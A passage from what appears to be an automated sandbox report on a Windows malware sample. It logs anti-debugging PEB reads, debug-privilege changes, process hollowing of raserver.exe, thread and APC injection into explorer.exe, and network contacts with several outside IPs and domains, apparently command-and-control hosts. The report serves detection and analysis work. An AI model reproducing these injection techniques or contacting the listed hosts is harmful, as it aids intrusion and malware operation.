            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044C0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044C746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04571074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04562073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04574015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04574015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04527016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04527016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04527016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04561C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04561C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04561C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04561C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04561C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04561C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04561C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04561C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04561C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04561C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04561C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04561C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04561C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04561C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04526C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04526C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04526C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04526C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0457740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0457740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0457740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044BB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044BB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044BB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044BB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044DBC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04578CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0453B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0453B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0453B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0453B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0453B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0453B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04526CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04526CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04526CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044A58EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_045614FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044A9080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044B849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04523884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04523884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E90AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044DF0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044DF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044DF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044CB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044CB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E3D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04523540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044C7D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044AC962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044AB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044AB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044CC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044CC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044A9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044A9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044A9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04578D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0452A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044C4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044C4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044C4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044C4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044C4120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0456E539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044AAD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04526DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04526DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04526DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04526DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04526DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04526DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04558DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044AB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044AB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044AB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044BD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044BD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0456FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0456FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0456FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0456FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_045341E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044A2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044A2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044A2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044A2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044A2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044DA185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044CC182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044DFD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044DFD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D2990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D35A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_045251BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_045251BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_045251BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_045251BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D61A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D61A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_045269A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_045705AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_045705AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0456EA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04534257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044A9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044A9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044A9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044A9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044B7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044B7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044B7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044B7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044B7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044B7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0456AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0456AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044B766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0455B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0455B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04578A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044CAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044CAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044CAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044CAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044CAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044B8A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044AC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044AC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044AC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D8E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044C3A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044DA61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044DA61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044A5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044A5210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044A5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044A5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044AAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044AAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04561608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E4A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E4A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0455FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044AE620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04578ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D36CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D2ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E8EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0455FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044B76E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D2AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D16E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0453FE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044DD294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044DD294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044A52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044A52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044A52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044A52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044A52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04570EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04570EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04570EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_045246A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044BAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044BAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044DFAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044ADB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044BEF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04578B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044AF358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044ADB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044BFF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D3B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D3B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04578F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0453FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0453FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044DA70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044DA70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0456131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\raserver.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeNetwork Connect: 52.58.78.16 80
            Source: C:\Windows\explorer.exeDomain query: www.gmopanama.com
            Source: C:\Windows\explorer.exeNetwork Connect: 15.165.26.252 80
            Source: C:\Windows\explorer.exeDomain query: www.cqsjny.com
            Source: C:\Windows\explorer.exeDomain query: www.yashaerotech.com
            Source: C:\Windows\explorer.exeNetwork Connect: 172.67.187.138 80
            Source: C:\Windows\explorer.exeDomain query: www.morrealeestates.com
            Source: C:\Windows\explorer.exeDomain query: www.mvprunning.com
            Source: C:\Windows\explorer.exeNetwork Connect: 172.67.219.254 80
            Source: C:\Windows\explorer.exeNetwork Connect: 147.255.37.207 80
            Source: C:\Windows\explorer.exeDomain query: www.betbonusuk.com
            Source: C:\Windows\explorer.exeDomain query: www.getboostphlo.com
            Source: C:\Windows\explorer.exeNetwork Connect: 198.148.114.222 80
            Source: C:\Windows\explorer.exeDomain query: www.aa29996.com
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
            Source: C:\Windows\explorer.exeDomain query: www.ux300e.com
            Source: C:\Windows\explorer.exeDomain query: www.okitmall.com
            Source: C:\Windows\explorer.exeDomain query: www.runcouver.com
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeMemory written: C:\Users\user\Desktop\hvEop8Y70Y.exe base: 400000 value starts with: 4D5A
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeThread register set: target process: 3472
            Source: C:\Windows\SysWOW64\raserver.exeThread register set: target process: 3472
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeThread APC queued: target process: C:\Windows\explorer.exe
            Sample uses process hollowing techniqueShow sources
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeSection unmapped: C:\Windows\SysWOW64\raserver.exe base address: CB0000
